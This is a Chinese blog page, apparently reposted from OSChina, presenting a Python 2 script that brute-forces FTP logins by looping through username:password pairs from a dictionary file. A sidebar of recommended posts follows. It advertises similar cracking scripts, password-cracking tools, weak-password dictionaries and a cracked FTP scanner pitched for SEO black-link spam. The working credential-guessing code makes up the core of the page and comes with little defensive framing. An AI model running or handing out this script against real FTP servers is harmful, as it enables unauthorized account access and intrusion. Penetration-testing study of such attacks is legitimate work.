渗透测试python编程之FTP暴力破解用户口令

最新推荐文章于 2023-08-02 22:13:58 发布
最新推荐文章于 2023-08-02 22:13:58 发布
阅读量110 收藏 1
点赞数 1
原文链接:https://my.oschina.net/medivhxu/blog/1486406
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

一、环境

    windows10 + python2.7

二、思路

    遍历密码字典

三、code

#!/usr/bin/env python
# coding=utf-8

import ftplib


def bruteLogin(hostname, passwordFile):
    pF = open(passwordFile, 'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print '[+] Trying: ' + username + '/' + password
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username, password)
            print '\n [*] ' + str(hostname) + 'FTP logon Succeeded: ' + username + '/' + password
            ftp.quit()
            return username, password
        except Exception, e:
            pass
    print '\n[-] Could not brute force FTP credentials.'
    return None, None


host = '192.168.0.0'
passwordFile = 'userpass.txt'
bruteLogin(host, passwordFile)

 

转载于:https://my.oschina.net/medivhxu/blog/1486406

weixin_33737774
关注
ftp暴力破解 python脚本
12-24
ftp暴力破解 python脚本
工具分享(1):FTP暴力破解工具 [Python多线程版]
localhost01
10-08 2248
工具分享(1):FTP暴力破解工具 [Python多线程版]   参考:https://www.waitalone.cn/python-ftp-mult.html 在他的基础上加了这么一个代码:如果用户输入的目标是域名,则将域名加入到爆破用户列表中,增加爆破成功率。 #!/usr/bin/env python # -*- coding: utf-8 -*- import ftplib, ...
FTP渗透测试
weixin_30485291的博客
09-24 713
在这篇文章中,我们将学习如何在CentOS机器配置ProFTPD的服务。之后,我们将进行渗透测试,以评估FTP服务的安全性,那么我们也将学习漏洞的对策。 在CentOS Linux机器的安装和配置FTP服务 [1] ProFTPD的源代码库的ProFTPD的服务器(1.3.3a)旧版本的源代码下载,位于ftp://ftp.proftpd.org/distrib/source/proftpd-1...
使用Ftplib暴力破解FTP用户口令
zwlww1的博客
01-08 1541
#!/usr/bin/python #coding=utf-8 import ftplib def bruteLogin(hostname, passwdFile): pF=open(passwdFile,'r') for line in pF.readlines(): username=line.split(':')[0] password=line.split(':')[1].s
ftp密码破解脚本
Bu2n的博客
12-20 1054
代码运行结果测试环境遇到的问题 代码 import ftplib import sys import argparse """ 测试环境python3.10 """ # 建立ftp连接 def ftp_connect(host,user,password): try: print(f'[+] 尝试登录 {password}') ftp = ftplib.FTP(host,user,password,encoding='gbk') except ftpl.
Python渗透测试编程技术------FTP暴力破解模块实验(二)
dyx0910的博客
04-28 974
Python渗透测试编程技术------FTP暴力破解模块实验(二)
Python渗透测试编程技术大全
ada的博客
03-30 1499
Python渗透测试编程技术大全 一、漏洞渗透模块1、测试软件的溢出漏洞(1)栈溢出漏洞发现2、计算软件溢出的偏移地址3、查找JMP ESP指令(1)执行恶意的攻击载荷二、网络嗅探与欺骗1、网络数据嗅探(1)编写一个网络嗅探工具(2)调用WireShark来查看数据包2、ARP的原理与缺陷(1)中间人欺骗(2)中间人欺骗的原理三、拒绝服务攻击1、数据链路层的拒绝服务攻击(1)攻击方式2、网络层的拒绝服务攻击(1)网络层的协议:ARP、IP和ICMP等(2)如何提高发送到目标的数据包的数量3、传输层的拒绝服务
Python安全攻防:渗透测试实战指南》配套技术讲解
Ms08067安全实验室
11-10 3174
如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》已经出版,配套星球现在可以...
Python渗透测试编程技术——身份认证攻击
weixin_50341025的博客
03-31 783
一、简单网络服务认证的攻击 四分之三原则:数字 大写字母 小写字母 特殊的字符 不要少于8为 更换密码的频次 不要小于3个月 针对这些简单的网络服务认证,可以采用一种“暴力破解”的方法。这种方法的思路很简单,就是把所有可能的密码都尝试一遍,通常可以将这些密码保存为一个字典文件。 (1)纯字典攻击。这种思路最为简单,攻击者只需要利用攻击工具将用户名和字典文件中的密码组合起来,一个个地进行尝试即可。 (2)混合攻击。现在的各种应用对密码的强壮度都有了限制,例如,在注册一些应用的时候,通常都不允许使用“
ftp密码破解——ncrack、hydra、medusa
D-R0s1的博客
07-15 1万+
ftp密码破解                                        ——ncrack、Hydra         下面和大家分享两个kali linux中的密码破解工具(ncrack,hydra),本文主要介绍一下一些关于ftp破解过程中的简单的命令。        首先,我们可以通过直接在终端用ncrack得到ncrack版本以及相关命令的解释,如图直接上手操作,在我们...
FTP批量关键字扫描工具(破解版),seo黑链专用
07-24
下好后只要解压出来,把电脑的时间年份改成2006年就行了。
FTP密码破解工具 破解FTP密码
07-28
FTP密码破解工具 破解FTP密码 绝对好用 国外的哦
ftpCracker-ftp口令多线程批量猜解工具(无源码)
12-27
限于不成泛滥的原因,部分组件将在2011年新年到来之际失效(科下载带源码的资源,但需要积分) 愿诸位为中华网络的进步做更大贡献! 虎胆游侠
爆破字典用户名top500
12-13
常见前500的用户名字典
经典弱口令字典
10-20
口令字典,包括常见用户名,top1000的弱口令,常见协议的弱口令ftp、telnet等。用户和密码分文件保存,非常实用!
密码字典大全、默认服务字典(seclists)
墨痕诉清风的博客
08-27 3299
密码字典大全
【愚公系列】2023年04月 FTP及Telnet弱口令渗透测试之字典生成器
热门推荐
时光隧道
08-23 5万+
字典生成器是一种程序或工具,用于创建字典或词典文件,其中包含一个或多个词汇表或术语列表,以及它们的对应定义或说明。这些字典通常用于文本编辑器、词典应用程序、翻译引擎和其他需要自动化词汇和术语分析和处理的应用程序。可以通过手动输入单词和定义,或从文本文件、网站或其他数据源中导入信息来生成字典。
rdp、ftp协议的密码爆破
最新发布
过期的秋刀鱼
08-02 769
远程桌面 rdp协议 3389文件传输 FTP协议 20 21攻击方:Kali测试方:Win7两台都要在同一网段。
FTP-用户名密码暴力破解
Myu_wzy的博客
09-25 2990
一、实验环境 目标主机:Win2K3 192.168.20.145 攻击主机:Kali2 192.168.20.133 二、实验过程 创建一个名为admin1的administrators的用户 使用medusa暴力破解ftp密码 -h:靶机的IP地址-u:靶机用户名 -P:密码字典路径 -M:连接的模式 破解成功——User:admin1 Pass:admin1 使用nc连接FTP进行验证 ...
Python编程:开发者渗透测试实战
书中内容适用于对Python编程有基本了解并希望学习渗透测试的读者,即使是初入道德黑客领域的读者,也能通过此书了解系统漏洞,预防攻击。 在本书中,你将学习到以下关键知识点: 1. 熟悉Metasploit资源文件的生成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值